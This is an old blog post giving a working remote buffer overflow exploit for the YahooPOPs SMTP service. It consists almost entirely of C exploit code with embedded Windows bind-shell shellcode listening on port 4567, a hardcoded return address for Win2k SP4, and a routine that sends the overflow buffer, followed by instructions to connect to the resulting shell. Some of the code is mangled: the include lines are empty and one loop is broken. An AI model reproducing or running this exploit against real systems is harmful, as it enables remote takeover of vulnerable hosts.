Wednesday, November 14, 2007

Ypop Smtp Remote Buffer Overflow Exploit?

Ypop Smtp Remote Buffer Overflow Exploit?
This Bug is to send a request with more than 504 bytes that will overwrite ESP and cause a stack based overflow.

Example:
Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
504xA CODE

The EIP register will be overwritten and our code will be executed smile.gif
here is a little exploit

CODE

/*-= ---------------------------------- =-
* = YPOP SMTP Remote Buffer Overflow =
* = BindShell Exploit by cyrex =
* = Tested on Win2k SP4 =
*-= ---------------------------------- =-
* = Info: =
* = If you need more offsets you need =
* = to get the JMP Address of =
* = libcurl.dll and the return address =
* = of it. Try your luck. =
*-= ---------------------------------- =-
* = Usage: =
* = ./ypop -h =
*-= ---------------------------------- =-
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include

//;W32 BindShellcode by cyrex
//;Listen on port 4567
//;uses exit thread

unsigned char shellcode[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\xd7\x89\xe0"
"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"
"\x55\x20\x89\xc7\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00"
"\x10\x00\x00\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";

// Tested on Win2k SP4

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";

int fd,bytes;

void usage(char *prog)
{
printf("Usage: %s \n",prog);
printf("------\n");
printf(" -h e.g (-h 127.0.0.1)\n");
printf(" -p e.g (-p 25\n");
}
int main(int argc, char *argv[])
{
int arg,port,stack,i;
char evilbuf[1024];
char *hostname;
char buffer[300];
struct hostent *he;
struct sockaddr_in client;

printf("YPOP SMTP Remote Buffer overflow v0.4-0.6\n");
printf(" BindShell Exploit by cyrex\n");

printf("- - - - - - - - - - - - - - - - - - - - - \n");

if(argc<4) {
usage(argv[0]);
exit(-1);
}


while((arg=getopt(argc, argv, "h:p:t:")) != EOF) {
switch(arg) {
case 'h':
hostname=optarg;
break;
case 'p':
port=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}

if((he=gethostbyname(hostname))==NULL)
{
printf("[-] Error Resolving Hostname.. Failed\n");
exit(-1);
}
printf("[+] Connecting to %s on port %i\n",hostname,port);

if((fd=socket(AF_INET,SOCK_STREAM,0))==-1){
printf("[-] Socket Creation Failed.\n");
exit(-1);
}
client.sin_family = AF_INET;
client.sin_port = htons(port);
client.sin_addr = *((struct in_addr *)he->h_addr);

if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) {
printf("[-] Can't Connect to %s\n",hostname);
exit(-1);
}

printf("[+] Connected!\n");

if((bytes=recv(fd,buffer,300,0)) == NULL)
{
printf("[-] Error Receiving Welcome\n");
exit(-1);
}
buffer[bytes]='\0';
if((strstr(buffer,"220")==NULL) || (strstr(buffer,"YahooPOPs")==NULL) {
printf("[-] Hmm.. you sure this is a SMTP Server?\n");
exit(-1);
}

stack=504-sizeof(shellcode);
memset(evilbuf,0,sizeof(evilbuf));
for(i=0;istrcat(evilbuf,"\x90");
}
strcat(evilbuf,shellcode);
strcat(evilbuf,ret_code);
strcat(evilbuf,jump_back);
strcat(evilbuf,"\n");

printf("[+] Sending Evil Shellcode\n");

if(send(fd,evilbuf,strlen(evilbuf),0)==NULL)
{
printf("[-] Error sending Shellcode\n");
exit(-1);
}

printf("[+] Done. Now do:\n");
printf(" -> nc %s %i or\n",hostname,port);
printf(" -> telnet %s %i\n",hostname,port);

}